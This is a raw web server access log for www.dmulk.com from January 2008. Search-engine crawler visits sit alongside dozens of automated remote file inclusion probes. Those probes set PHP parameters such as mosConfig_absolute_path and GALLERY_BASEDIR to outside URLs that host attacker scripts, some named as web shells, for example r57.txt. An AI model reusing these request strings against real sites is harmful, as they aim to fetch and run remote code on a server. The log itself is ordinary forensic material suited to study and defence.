208.186.169.183 - - [06/Jan/2008:18:20:35 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:18:21:18 -0800] "GET /mobileoffice/b4_5.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [06/Jan/2008:18:22:20 -0800] "GET /mobileoffice/58_7.jpg HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
72.52.216.28 - - [06/Jan/2008:18:23:08 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.52.216.28 - - [06/Jan/2008:18:23:08 -0800] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.218.0.211 - - [06/Jan/2008:18:23:17 -0800] "GET /logs/access_071229.log//login.php?dir=http://pucorp.org/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.218.0.211 - - [06/Jan/2008:18:23:17 -0800] "GET /logs//login.php?dir=http://pucorp.org/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:18:26:09 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.161 - - [06/Jan/2008:18:27:07 -0800] "GET /bikes/dteel/140CANON/?S=A HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
129.241.104.174 - "" [06/Jan/2008:18:28:08 -0800] "GET /mobileoffice/ HTTP/1.1" 200 5024 "-" "boitho.com-dc/0.85 ( http://www.boitho.com/dcbot.html )" "www.dmulk.com"
207.58.166.122 - - [06/Jan/2008:18:28:33 -0800] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
207.58.166.122 - - [06/Jan/2008:18:28:33 -0800] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
121.173.130.140 - - [06/Jan/2008:18:28:41 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.107 - - [06/Jan/2008:18:31:36 -0800] "GET /bikes/dteel/140CANON/?S=D HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.118.106.191 - - [06/Jan/2008:18:31:40 -0800] "GET /extras/ext_cats.php?dir_path=http://bobatka.info/modules/language/asc/asc/r7?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
87.118.106.191 - - [06/Jan/2008:18:31:40 -0800] "GET /logs/extras/ext_cats.php?dir_path=http://bobatka.info/modules/language/asc/asc/r7?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.87.63.234 - - [06/Jan/2008:18:32:01 -0800] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.87.63.234 - - [06/Jan/2008:18:32:02 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.87.63.234 - - [06/Jan/2008:18:34:28 -0800] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.87.63.234 - - [06/Jan/2008:18:34:28 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:18:35:34 -0800] "GET /logs/index.php?skin_file=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
196.40.106.216 - - [06/Jan/2008:18:35:49 -0800] "GET /index.php?skin_file=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
74.6.22.221 - - [06/Jan/2008:18:51:23 -0800] "GET /tools/ HTTP/1.0" 200 12388 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.209.207 - - [06/Jan/2008:18:54:45 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [06/Jan/2008:18:54:45 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
203.146.140.96 - - [06/Jan/2008:18:57:18 -0800] "GET /logs/access_071229.log//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.140.96 - - [06/Jan/2008:18:57:21 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.140.96 - - [06/Jan/2008:18:57:22 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.34.1.65 - - [06/Jan/2008:18:59:08 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:18:59:57 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:25 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:25 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:26 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:26 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:26 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:26 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:27 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:27 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:27 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.52.216.28 - - [06/Jan/2008:19:01:27 -0800] "GET /logs/index.php?option=com_joomlaxplorer&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:27 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:27 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:27 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:27 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:27 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:27 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:53 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:53 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.94.127 - - [06/Jan/2008:19:01:53 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.1.54 - - [06/Jan/2008:19:10:28 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.1.54 - - [06/Jan/2008:19:10:28 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.1.54 - - [06/Jan/2008:19:10:28 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.144.221.142 - - [06/Jan/2008:19:13:19 -0800] "GET /funny/ HTTP/1.1" 200 812 "http://www.google.com.mx/search?q=index+of/+funny&hl=es&ie=UTF-8&start=20&sa=N" "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)" "www.dmulk.com"
189.144.221.142 - - [06/Jan/2008:19:13:26 -0800] "GET / HTTP/1.1" 200 2962 "http://www.dmulk.com/funny/" "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:14:34 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:14:44 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:14:49 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:16:14 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:16:15 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:16:16 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:19:27 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:19:28 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:19:29 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.1.54 - - [06/Jan/2008:19:19:42 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.1.54 - - [06/Jan/2008:19:19:43 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.1.54 - - [06/Jan/2008:19:19:43 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.177.128.128 - - [06/Jan/2008:19:20:08 -0800] "GET /logs/access_071212.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.177.128.128 - - [06/Jan/2008:19:20:13 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.177.128.128 - - [06/Jan/2008:19:20:13 -0800] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.59.6.230 - - [06/Jan/2008:19:20:47 -0800] "GET /logs//securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.59.6.230 - - [06/Jan/2008:19:20:47 -0800] "GET //securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:21:02 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:21:03 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:21:08 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:21:44 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:21:45 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:21:46 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.73 - - [06/Jan/2008:19:22:00 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:22:25 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:22:35 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [06/Jan/2008:19:22:36 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.20.200 - - [06/Jan/2008:19:24:22 -0800] "GET /plans/?S=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.2.3 - - [06/Jan/2008:19:28:10 -0800] "GET /logs//securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.2.3 - - [06/Jan/2008:19:28:11 -0800] "GET //securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.26.2 - - [06/Jan/2008:19:30:56 -0800] "GET /components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.26.2 - - [06/Jan/2008:19:30:56 -0800] "GET /components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.26.2 - - [06/Jan/2008:19:31:00 -0800] "GET /components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.26.2 - - [06/Jan/2008:19:31:45 -0800] "GET /logs/access_071229.log/components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.26.2 - - [06/Jan/2008:19:31:45 -0800] "GET /logs/access_071229.log/components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.26.2 - - [06/Jan/2008:19:31:45 -0800] "GET /logs/components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.26.2 - - [06/Jan/2008:19:31:45 -0800] "GET /logs/components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.26.2 - - [06/Jan/2008:19:31:46 -0800] "GET /logs/access_071229.log/components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.26.2 - - [06/Jan/2008:19:31:46 -0800] "GET /logs/components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.59.6.230 - - [06/Jan/2008:19:36:55 -0800] "GET /logs/access_071210.log//securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.34.1.65 - - [06/Jan/2008:19:38:33 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.34.1.65 - - [06/Jan/2008:19:38:34 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.59.6.230 - - [06/Jan/2008:19:41:58 -0800] "GET /logs/access_071216.log//securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.2.3 - - [06/Jan/2008:19:43:26 -0800] "GET /logs/access_071210.log//securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.132.217.62 - - [06/Jan/2008:19:45:42 -0800] "GET /components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.132.217.62 - - [06/Jan/2008:19:45:49 -0800] "GET /components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.132.217.62 - - [06/Jan/2008:19:45:57 -0800] "GET /components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.2.3 - - [06/Jan/2008:19:48:16 -0800] "GET /logs/access_071216.log//securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
168.212.152.100 - - [06/Jan/2008:19:49:33 -0800] "GET /logs//securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://doodlepacific.com/public_html/images/articles/gif.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
168.212.152.100 - - [06/Jan/2008:19:49:33 -0800] "GET //securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://doodlepacific.com/public_html/images/articles/gif.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.20.143 - - [06/Jan/2008:19:49:39 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
220.132.217.62 - - [06/Jan/2008:19:49:51 -0800] "GET /logs/access_071229.log/components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.132.217.62 - - [06/Jan/2008:19:49:52 -0800] "GET /logs/components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.132.217.62 - - [06/Jan/2008:19:49:53 -0800] "GET /logs/access_071229.log/components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.132.217.62 - - [06/Jan/2008:19:49:54 -0800] "GET /logs/components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.132.217.62 - - [06/Jan/2008:19:50:10 -0800] "GET /logs/access_071229.log/components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.132.217.62 - - [06/Jan/2008:19:50:12 -0800] "GET /logs/components/com_minibb/bb_plugins.php?absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.232.117.131 - - [06/Jan/2008:19:55:32 -0800] "GET /logs/securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.117.131 - - [06/Jan/2008:19:55:32 -0800] "GET /securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
129.241.104.189 - - [06/Jan/2008:19:57:39 -0800] "GET /warboard/ HTTP/1.1" 401 395 "-" "boitho.com-dc/0.85 ( http://www.boitho.com/dcbot.html )" "www.dmulk.com"
66.7.205.39 - - [06/Jan/2008:19:59:16 -0800] "GET /logs/access_071229.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.39 - - [06/Jan/2008:19:59:20 -0800] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
